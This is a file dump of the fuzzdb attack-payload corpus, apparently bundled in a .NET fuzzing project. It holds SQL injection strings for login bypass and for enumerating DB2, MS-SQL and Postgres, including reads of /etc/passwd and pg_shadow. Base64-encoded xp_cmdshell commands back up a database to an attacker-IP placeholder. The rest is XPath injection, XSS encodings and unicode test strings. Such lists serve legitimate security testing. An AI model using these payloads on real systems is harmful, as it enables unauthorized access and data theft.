1 | c2VsZWN0IHZlcnNpb25udW1iZXIsIHZlcnNpb25fdGltZXN0YW1wIGZyb20gc3lzaWJtLnN5c3ZlcnNpb25zOw0Kc2VsZWN0IHVzZXIgZnJvbSBzeXNpYm0uc3lzZHVtbXkxOw0Kc2VsZWN0IHNlc3Npb25fdXNlciBmcm9tIHN5c2libS5zeXNkdW1teTE7DQpzZWxlY3Qgc3lzdGVtX3VzZXIgZnJvbSBzeXNpYm0uc3lzZHVtbXkxOw0Kc2VsZWN0IGN1cnJlbnQgc2VydmVyIGZyb20gc3lzaWJtLnN5c2R1bW15MTsNCnNlbGVjdCBuYW1lIGZyb20gc3lzaWJtLnN5c3RhYmxlczsNCnNlbGVjdCBncmFudGVlIGZyb20gc3lzY2F0LmRiYXV0aDsNCnNlbGVjdCAqIGZyb20gc3lzY2F0LnRhYmF1dGg7DQpzZWxlY3QgKiBmcm9tIHN5c2NhdC5kYmF1dGggd2hlcmUgZ3JhbnRlZSA9IGN1cnJlbnQgdXNlcjsNCnNlbGVjdCAqIGZyb20gc3lzY2F0LnRhYmF1dGggd2hlcmUgZ3JhbnRlZSA9IGN1cnJlbnQgdXNlcjsNCnNlbGVjdCBuYW1lLCB0Ym5hbWUsIGNvbHR5cGUgZnJvbSBzeXNpYm0uc3lzY29sdW1uczsNClNFTEVDVCBzY2hlbWFuYW1lIEZST00gc3lzY2F0LnNjaGVtYXRhOw0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/ms-sql-enumeration.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/queen-of-code/DotnetModelFuzzing/b67a47f8b5e50f5d49f02fe5f9ab2b3253ecc38c/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/ms-sql-enumeration.txt
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/ms-sql-enumeration.txt.base64:
--------------------------------------------------------------------------------
1 | c2VsZWN0IEBAdmVyc2lvbg0Kc2VsZWN0IEBAc2VydmVybmFtZWUNCnNlbGVjdCBAQG1pY3Jvc29mdHZlcnNpb25lDQpzZWxlY3QgKiBmcm9tIG1hc3Rlci4uc3lzc2VydmVyc2UNCnNlbGVjdCAqIGZyb20gc3lzdXNlcnMNCmV4ZWMgbWFzdGVyLi54cF9jbWRzaGVsbCAnaXBjb25maWcrL2FsbCcJDQpleGVjIG1hc3Rlci4ueHBfY21kc2hlbGwgJ25ldCt2aWV3Jw0KZXhlYyBtYXN0ZXIuLnhwX2NtZHNoZWxsICduZXQrdXNlcnMnDQpleGVjIG1hc3Rlci4ueHBfY21kc2hlbGwgJ3BpbmcrPGF0dGFja2VyaXA+Jw0KQkFDS1VQIGRhdGFiYXNlIG1hc3RlciB0byBkaXNrcz0nXFw8YXR0YWNrZXJpcD5cPGF0dGFja2VyaXA+XGJhY2t1cGRiLmRhdCcNCmNyZWF0ZSB0YWJsZSBteWZpbGUgKGxpbmUgdmFyY2hhcig4MDAwKSkiIGJ1bGsgaW5zZXJ0IGZvbyBmcm9tICdjOlxpbmV0cHViXHd3d3Jvb3RcYXV0aC5hc3DDoiciIHNlbGVjdCAqIGZyb20gbXlmaWxlIi0tDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/mysql-injection-login-bypass.txt:
--------------------------------------------------------------------------------
1 | ' OR 1=1--
2 | 'OR '' = ' Allows authentication without a valid username.
3 | '--
4 | ' union select 1, '', '' 1--
5 | 'OR 1=1--
6 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/mysql-injection-login-bypass.txt.base64:
--------------------------------------------------------------------------------
1 | PHVzZXJuYW1lPicgT1IgMT0xLS0NCidPUiAnJyA9ICcJQWxsb3dzIGF1dGhlbnRpY2F0aW9uIHdpdGhvdXQgYSB2YWxpZCB1c2VybmFtZS4NCjx1c2VybmFtZT4nLS0NCicgdW5pb24gc2VsZWN0IDEsICc8dXNlci1maWVsZG5hbWU+JywgJzxwYXNzLWZpZWxkbmFtZT4nIDEtLQ0KJ09SIDE9MS0tDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/mysql-read-local-files.txt:
--------------------------------------------------------------------------------
1 | create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile;
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/mysql-read-local-files.txt.base64:
--------------------------------------------------------------------------------
1 | Y3JlYXRlIHRhYmxlIG15ZmlsZSAoaW5wdXQgVEVYVCk7IGxvYWQgZGF0YSBpbmZpbGUgJzxmaWxlcGF0aD4nIGludG8gdGFibGUgbXlmaWxlOyBzZWxlY3QgKiBmcm9tIG15ZmlsZTsNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/postgres-enumeration.txt:
--------------------------------------------------------------------------------
1 | select version();
2 | select current_database();
3 | select current_user;
4 | select session_user;
5 | select current_setting('log_connections');
6 | select current_setting('log_statement');
7 | select current_setting('port');
8 | select current_setting('password_encryption');
9 | select current_setting('krb_server_keyfile');
10 | select current_setting('virtual_host');
11 | select current_setting('port');
12 | select current_setting('config_file');
13 | select current_setting('hba_file');
14 | select current_setting('data_directory');
15 | select * from pg_shadow;
16 | select * from pg_group;
17 | create table myfile (input TEXT);
18 | copy myfile from '/etc/passwd';
19 | select * from myfile;copy myfile to /tmp/test;
20 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/postgres-enumeration.txt.base64:
--------------------------------------------------------------------------------
1 | c2VsZWN0IHZlcnNpb24oKTsJDQpzZWxlY3QgY3VycmVudF9kYXRhYmFzZSgpOw0Kc2VsZWN0IGN1cnJlbnRfdXNlcjsNCnNlbGVjdCBzZXNzaW9uX3VzZXI7DQpzZWxlY3QgY3VycmVudF9zZXR0aW5nKCdsb2dfY29ubmVjdGlvbnMnKTsNCnNlbGVjdCBjdXJyZW50X3NldHRpbmcoJ2xvZ19zdGF0ZW1lbnQnKTsNCnNlbGVjdCBjdXJyZW50X3NldHRpbmcoJ3BvcnQnKTsNCnNlbGVjdCBjdXJyZW50X3NldHRpbmcoJ3Bhc3N3b3JkX2VuY3J5cHRpb24nKTsNCnNlbGVjdCBjdXJyZW50X3NldHRpbmcoJ2tyYl9zZXJ2ZXJfa2V5ZmlsZScpOw0Kc2VsZWN0IGN1cnJlbnRfc2V0dGluZygndmlydHVhbF9ob3N0Jyk7DQpzZWxlY3QgY3VycmVudF9zZXR0aW5nKCdwb3J0Jyk7DQpzZWxlY3QgY3VycmVudF9zZXR0aW5nKCdjb25maWdfZmlsZScpOw0Kc2VsZWN0IGN1cnJlbnRfc2V0dGluZygnaGJhX2ZpbGUnKTsNCnNlbGVjdCBjdXJyZW50X3NldHRpbmcoJ2RhdGFfZGlyZWN0b3J5Jyk7DQpzZWxlY3QgKiBmcm9tIHBnX3NoYWRvdzsNCnNlbGVjdCAqIGZyb20gcGdfZ3JvdXA7DQpjcmVhdGUgdGFibGUgbXlmaWxlIChpbnB1dCBURVhUKTsNCmNvcHkgbXlmaWxlIGZyb20gJy9ldGMvcGFzc3dkJzsgDQpzZWxlY3QgKiBmcm9tIG15ZmlsZTtjb3B5IG15ZmlsZSB0byAvdG1wL3Rlc3Q7DQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/payloads-sql-blind/README.md:
--------------------------------------------------------------------------------
1 | credits: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/string-expansion/shell-expansion.txt:
--------------------------------------------------------------------------------
1 | $HOME
2 | $ENV{'HOME'}
3 | %d
4 | %s
5 | {0}
6 | %*.*s
7 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/string-expansion/shell-expansion.txt.base64:
--------------------------------------------------------------------------------
1 | JEhPTUUNCiRFTlZ7J0hPTUUnfQ0KJWQNCiVzDQp7MH0NCiUqLipzDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/README.md:
--------------------------------------------------------------------------------
1 | Many of the files in this directory originated from the project
2 | https://github.com/minimaxir/big-list-of-naughty-strings
3 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/corrupted.txt:
--------------------------------------------------------------------------------
1 | Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣
2 | ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰
3 | ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟
4 | ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕
5 | Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮
6 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/emoji.txt:
--------------------------------------------------------------------------------
1 |
2 | 😍
3 | 👩🏽
4 | 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍
5 | 🐵 🙈 🙉 🙊
6 | ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙
7 | ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿
8 | 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧
9 | 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟
10 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/emoji.txt.base64:
--------------------------------------------------------------------------------
1 | DQrDsMW4y5zCjQ0Kw7DFuOKAmMKpw7DFuMKPwr0NCsOwxbjigJjCviDDsMW44oSi4oChIMOwxbjigJnCgSDDsMW44oSi4oCmIMOwxbjihKLigKAgw7DFuOKEouKAuSDDsMW44oSixb0gw7DFuOKEosKNIA0Kw7DFuMKQwrUgw7DFuOKEosuGIMOwxbjihKLigLAgw7DFuOKEosWgDQrDosKdwqTDr8K4wo8gw7DFuOKAmeKAnSDDsMW44oCZxZIgw7DFuOKAmeKAoiDDsMW44oCZxb4gw7DFuOKAmeKAnCDDsMW44oCZ4oCUIMOwxbjigJnigJMgw7DFuOKAmcucIMOwxbjigJnCnSDDsMW44oCZxbggw7DFuOKAmcWTIMOwxbjigJnigLogw7DFuOKAmcWhIMOwxbjigJnihKINCsOixZPigLnDsMW4wo/CvyDDsMW44oCZwqrDsMW4wo/CvyDDsMW44oCYwpDDsMW4wo/CvyDDsMW44oSixZLDsMW4wo/CvyDDsMW44oCYwo/DsMW4wo/CvyDDsMW44oSiwo/DsMW4wo/Cvw0Kw7DFuMWhwr4gw7DFuOKAoOKAmSDDsMW44oCg4oCcIMOwxbjigKDigKIgw7DFuOKAoOKAkyDDsMW44oCg4oCUIMOwxbjigKDihKIgw7DFuMKPwqcNCjDDr8K4wo/DosaSwqMgMcOvwrjCj8OixpLCoyAyw6/CuMKPw6LGksKjIDPDr8K4wo/DosaSwqMgNMOvwrjCj8OixpLCoyA1w6/CuMKPw6LGksKjIDbDr8K4wo/DosaSwqMgN8OvwrjCj8OixpLCoyA4w6/CuMKPw6LGksKjIDnDr8K4wo/DosaSwqMgw7DFuOKAncW4DQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/japanese-emoticon.txt:
--------------------------------------------------------------------------------
1 | ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ
2 | (。◕ ∀ ◕。)
3 | `ィ(´∀`∩
4 | __ロ(,_,*)
5 | ・( ̄∀ ̄)・:*:
6 | ゚・✿ヾ╲(。◕‿◕。)╱✿・゚
7 | ,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’
8 | (╯°□°)╯︵ ┻━┻)
9 | (ノಥ益ಥ)ノ ┻━┻
10 | ┬─┬ノ( º _ ºノ)
11 | ( ͡° ͜ʖ ͡°)
12 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/japanese-emoticon.txt.base64:
--------------------------------------------------------------------------------
1 | w6PGksK9w6DCvMK8w6DCusuGw5nigJ7DjcWTw6DCusuGw6DCvMK9w6/CvuKAsCDDo8aSwr3DoMK8wrzDoMK6y4bDmeKAnsONxZPDoMK6y4bDoMK8wr3Dr8K+4oCwIA0KKMOvwr3CocOi4oCU4oCiIMOiy4bigqwgw6LigJTigKLDr8K9wqEpDQrDr8K94oKsw6/CvcKoKMOCwrTDosuG4oKsw6/CveKCrMOiy4bCqQ0KX1/Dr8K+4oC6KCxfLCopDQrDo8aSwrsow6/Cv8Kjw6LLhuKCrMOvwr/CoynDo8aSwrs6KjoNCsOvwr7FuMOvwr3CpcOixZPCv8OjxpLCvsOi4oCiwrIow6/CvcKhw6LigJTigKLDouKCrMK/w6LigJTigKLDr8K9wqEpw6LigKLCscOixZPCv8Ovwr3CpcOvwr7FuA0KLMOj4oKs4oCaw6PGksK7Oio6w6PGksK7w6PigJrFk8Oi4oKs4oSiKCDDosucwrsgw4/igLAgw6LLnMK7ICnDo+KCrOKAmsOjxpLCuzoqOsOjxpLCu8Oj4oCaxZPDouKCrOKEog0KKMOi4oCiwq/DgsKww6LigJPCocOCwrDDr8K84oCww6LigKLCr8OvwrjCtSDDouKAncK7w6LigJ3CgcOi4oCdwrspICANCijDr8K+4oCww6DCssKlw6figLrFoMOgwrLCpcOvwrzigLDDr8K+4oCww6/Cu8K/IMOi4oCdwrvDouKAncKBw6LigJ3Cuw0Kw6LigJ3CrMOi4oCd4oKsw6LigJ3CrMOjxpLFvSggw4LCuiBfIMOCwrrDo8aSxb0pDQooIMONwqHDgsKwIMONxZPDiuKAkyDDjcKhw4LCsCkNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/naughty-unicode.txt:
--------------------------------------------------------------------------------
1 | Ω≈ç√∫˜µ≤≥÷
2 | åß∂ƒ©˙∆˚¬…æ
3 | œ∑´®†¥¨ˆøπ“‘
4 | ¡™£¢∞§¶•ªº–≠
5 | ¸˛Ç◊ı˜Â¯˘¿
6 | ÅÍÎÏ˝ÓÔÒÚÆ☃
7 | Œ„´‰ˇÁ¨ˆØ∏”’
8 | `⁄€‹›fifl‡°·‚—±
9 | ⅛⅜⅝⅞
10 | ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя
11 | ٠١٢٣٤٥٦٧٨٩
12 |
13 |
14 |
15 |
16 |
17 | ⁰⁴⁵
18 | ₀₁₂
19 | ⁰⁴⁵₀₁₂
20 | ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็
21 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/regionalindicators.txt:
--------------------------------------------------------------------------------
1 | 🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸
2 | 🇺🇸🇷🇺🇸🇦🇫🇦🇲
3 | 🇺🇸🇷🇺🇸🇦
4 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/regionalindicators.txt.base64:
--------------------------------------------------------------------------------
1 | w7DFuOKAocK6w7DFuOKAocK4w7DFuOKAocK3w7DFuOKAocK6w7DFuOKAocK4IMOwxbjigKHCpsOwxbjigKHCq8OwxbjigKHCpsOwxbjigKHCssOwxbjigKHCuCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0Kw7DFuOKAocK6w7DFuOKAocK4w7DFuOKAocK3w7DFuOKAocK6w7DFuOKAocK4w7DFuOKAocKmw7DFuOKAocKrw7DFuOKAocKmw7DFuOKAocKyDQrDsMW44oChwrrDsMW44oChwrjDsMW44oChwrfDsMW44oChwrrDsMW44oChwrjDsMW44oChwqYNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/right-to-left.txt:
--------------------------------------------------------------------------------
1 | ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.
2 | בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ
3 | הָיְתָהtestالصفحات التّحول
4 | ﷽
5 | ﷺ
6 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/specialchars.txt:
--------------------------------------------------------------------------------
1 | ,
2 | .
3 | /
4 | ;
5 | '
6 | [
7 | ]
8 | \
9 | -
10 | =
11 | <
12 | >
13 | ?
14 | :
15 | "
16 | {
17 | }
18 | |
19 | _
20 | +
21 | !
22 | @
23 | #
24 | $
25 | %
26 | ^
27 | &
28 | *
29 | (
30 | )
31 | `
32 | ~
33 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/specialchars.txt.base64:
--------------------------------------------------------------------------------
1 | LA0KLg0KLw0KOw0KJw0KWw0KXQ0KXA0KLQ0KPQ0KPA0KPg0KPw0KOg0KIg0Kew0KfQ0KfA0KXw0KKw0KIQ0KQA0KIw0KJA0KJQ0KXg0KJg0KKg0KKA0KKQ0KYA0Kfg0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/two-byte-chars.txt:
--------------------------------------------------------------------------------
1 | 田中さんにあげて下さい
2 | パーティーへ行かないか
3 | 和製漢語
4 | 部落格
5 | 사회과학원 어학연구소
6 | 찦차를 타고 온 펲시맨과 쑛다리 똠방각하
7 | 社會科學院語學研究所
8 | 울란바토르
9 | 𠜎𠜱𠝹𠱓𠱸𠲖𠳏
10 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/two-byte-chars.txt.base64:
--------------------------------------------------------------------------------
1 | w6figJ3CsMOkwrjCrcOjwoHigKLDo+KAmuKAnMOjwoHCq8OjwoHigJrDo8KB4oCZw6PCgcKmw6TCuOKAucOjwoHigKLDo8KB4oCeDQrDo8aS4oCYw6PGksK8w6PGkuKAoMOj4oCawqPDo8aSwrzDo8KBwrjDqMKhxZLDo8KB4oC5w6PCgcKqw6PCgeKAnsOjwoHigLkNCsOl4oCZxZLDqMKjwr3DpsK8wqLDqMKqxb4NCsOpxpLCqMOowpDCvcOmwqDCvA0Kw6zigJrCrMOtxaHFksOqwrPCvMOt4oCi4oSiw6zigLrCkCDDrOKAk8K0w63igKLihKLDrOKAlMKww6rCtcKsw6zigKDFkg0Kw6zCsMKmw6zCsMKow6vCpcK8IMOtxpLigqzDqsKzwqAgw6zLnMKoIMOtxb3CssOs4oC5xZPDq8KnwqjDqsKzwrwgw6zigJjigLrDq+KAucKkw6vCpsKsIMOry5zCoMOrwrDCqcOqwrDCgcOt4oCiy5wNCsOnwqTCvsOmxZPGksOnwqfigJjDpcKtwrjDqeKEosKiw6jCqsW+w6XCrcK4w6fCoOKAncOnwqnCtsOm4oCw4oKsDQrDrMWhwrjDq8W+4oKsw6vCsOKAncOt4oCgwqDDq8KlwrQNCsOwwqDFk8W9w7DCoMWTwrHDsMKgwp3CucOwwqDCseKAnMOwwqDCscK4w7DCoMKy4oCTw7DCoMKzwo8NCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/upsidedown.txt:
--------------------------------------------------------------------------------
1 | ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥
2 | 00˙Ɩ$-
3 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/unicode/upsidedown.txt.base64:
--------------------------------------------------------------------------------
1 | w4vihKLDicKQbmLDocK04oCwbMOJwpAgw4nCkHXDhsaSw4nCkMOJwq8gw4fCncOJwrlvbG9wIMOK4oChw4fCnSDDh8Kdw4nCuW9xw4nCkGwgw4rigKFuIMOK4oChdW5ww6HCtOKAsHDDocK04oCww4nigJ11w6HCtOKAsCDDicK5b2TDicKvw4fCncOK4oChIHBvw4nCr3Nuw6HCtOKAsMOHwp0gb3AgcMOHwp1zICfDiuKAocOhwrTigLBsw4fCnSDDhsaSdcOhwrTigLDDieKAnXPDocK04oCwZMOhwrTigLBww4nCkCDDicK5bsOK4oChw4fCncOK4oChw4nigJ3Dh8Kdc3Vvw4nigJ0gJ8OK4oChw4fCncOJwq/DicKQIMOK4oChw6HCtOKAsHMgw4nCuW9sb3Agw4nCr25zZMOhwrTigLAgw4nCr8OHwp3DicK5b8OLwqUNCjAww4vihKLDhuKAkyQtDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xpath/README.md:
--------------------------------------------------------------------------------
1 | tool:
2 | http://code.google.com/p/xpath-blind-explorer/
3 |
4 | video:
5 | http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/
6 |
7 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xpath/xpath-injection.txt:
--------------------------------------------------------------------------------
1 | ' or '1'='1
2 | ' or ''='
3 | x' or 1=1 or 'x'='y
4 | /
5 | //
6 | //*
7 | */*
8 | @*
9 | count(/child::node())
10 | x' or name()='username' or 'x'='y
11 | ' and count(/*)=1 and '1'='1
12 | ' and count(/@*)=1 and '1'='1
13 | ' and count(/comment())=1 and '1'='1
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xpath/xpath-injection.txt.base64:
--------------------------------------------------------------------------------
1 | JyBvciAnMSc9JzENCicgb3IgJyc9Jw0KeCcgb3IgMT0xIG9yICd4Jz0neQ0KLw0KLy8NCi8vKg0KKi8qDQpAKg0KY291bnQoL2NoaWxkOjpub2RlKCkpDQp4JyBvciBuYW1lKCk9J3VzZXJuYW1lJyBvciAneCc9J3kNCicgYW5kIGNvdW50KC8qKT0xIGFuZCAnMSc9JzENCicgYW5kIGNvdW50KC9AKik9MSBhbmQgJzEnPScxDQonIGFuZCBjb3VudCgvY29tbWVudCgpKT0xIGFuZCAnMSc9JzE=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xss/README.md:
--------------------------------------------------------------------------------
1 | test.xxe - requested by some payloads from fuzzdb github repo raw filepath
2 | xss-rsnake.fuzz.txt - rsnake's classic fuzzfile, modified to load http://xss.rocks test files
3 | xss-other.fuzz.txt - newer payloads from various sources: my own testing, interesting filter bypassed found in the wild, etc.
4 | xss-uri.fuzz.txt - URI abuse test cases
5 | XSSPolyglot.fuzz.txt - from https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot - check the page for filter evasions and other interesting stuff
6 |
7 |
8 |
9 | HTML5 Cheatsheet
10 | * https://html5sec.org/
11 | * https://github.com/cure53/H5SC
12 |
13 |
14 |
15 | WASC Script Mapping Project
16 | * http://projects.webappsec.org/w/page/13246958/Script%20Mapping
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xss/all-encodings-of-lt.txt:
--------------------------------------------------------------------------------
1 | <
2 | %3C
3 | <
4 | <
5 | <
6 | <
7 | <
8 | <
9 | <
10 | <
11 | <
12 | <
13 | <
14 | <
15 | <
16 | <
17 | <
18 | <
19 | <
20 | <
21 | <
22 | <
23 | <
24 | <
25 | <
26 | <
27 | <
28 | <
29 | <
30 | <
31 | <
32 | <
33 | <
34 | <
35 | <
36 | <
37 | <
38 | <
39 | <
40 | <
41 | <
42 | <
43 | <
44 | <
45 | <
46 | <
47 | <
48 | <
49 | <
50 | <
51 | <
52 | <
53 | <
54 | <
55 | <
56 | <
57 | <
58 | <
59 | <
60 | <
61 | <
62 | <
63 | <
64 | <
65 | <
66 | <
67 | \x3c
68 | \x3C
69 | \u003c
70 | \u003C
71 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xss/all-encodings-of-lt.txt.base64:
--------------------------------------------------------------------------------
1 | PA0KJTNDDQombHQNCiZsdDsNCiZMVA0KJkxUOw0KJiM2MA0KJiMwNjANCiYjMDA2MA0KJiMwMDA2MA0KJiMwMDAwNjANCiYjMDAwMDA2MA0KJiM2MDsNCiYjMDYwOw0KJiMwMDYwOw0KJiMwMDA2MDsNCiYjMDAwMDYwOw0KJiMwMDAwMDYwOw0KJiN4M2MNCiYjeDAzYw0KJiN4MDAzYw0KJiN4MDAwM2MNCiYjeDAwMDAzYw0KJiN4MDAwMDAzYw0KJiN4M2M7DQomI3gwM2M7DQomI3gwMDNjOw0KJiN4MDAwM2M7DQomI3gwMDAwM2M7DQomI3gwMDAwMDNjOw0KJiNYM2MNCiYjWDAzYw0KJiNYMDAzYw0KJiNYMDAwM2MNCiYjWDAwMDAzYw0KJiNYMDAwMDAzYw0KJiNYM2M7DQomI1gwM2M7DQomI1gwMDNjOw0KJiNYMDAwM2M7DQomI1gwMDAwM2M7DQomI1gwMDAwMDNjOw0KJiN4M0MNCiYjeDAzQw0KJiN4MDAzQw0KJiN4MDAwM0MNCiYjeDAwMDAzQw0KJiN4MDAwMDAzQw0KJiN4M0M7DQomI3gwM0M7DQomI3gwMDNDOw0KJiN4MDAwM0M7DQomI3gwMDAwM0M7DQomI3gwMDAwMDNDOw0KJiNYM0MNCiYjWDAzQw0KJiNYMDAzQw0KJiNYMDAwM0MNCiYjWDAwMDAzQw0KJiNYMDAwMDAzQw0KJiNYM0M7DQomI1gwM0M7DQomI1gwMDNDOw0KJiNYMDAwM0M7DQomI1gwMDAwM0M7DQomI1gwMDAwMDNDOw0KXHgzYw0KXHgzQw0KXHUwMDNjDQpcdTAwM0MNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/xss/default-javascript-event-attributes.txt:
--------------------------------------------------------------------------------
1 | onAbort
2 | onBlur
3 | onChange
4 | onClick
5 | onDblClick
6 | onDragDrop
7 | onError
8 | onFocus
9 | onKeyDown
10 | onKeyPress
11 | onKeyUp
12 | onLoad
13 | onMouseDown
14 | onMouseMove
15 | onMouseOut
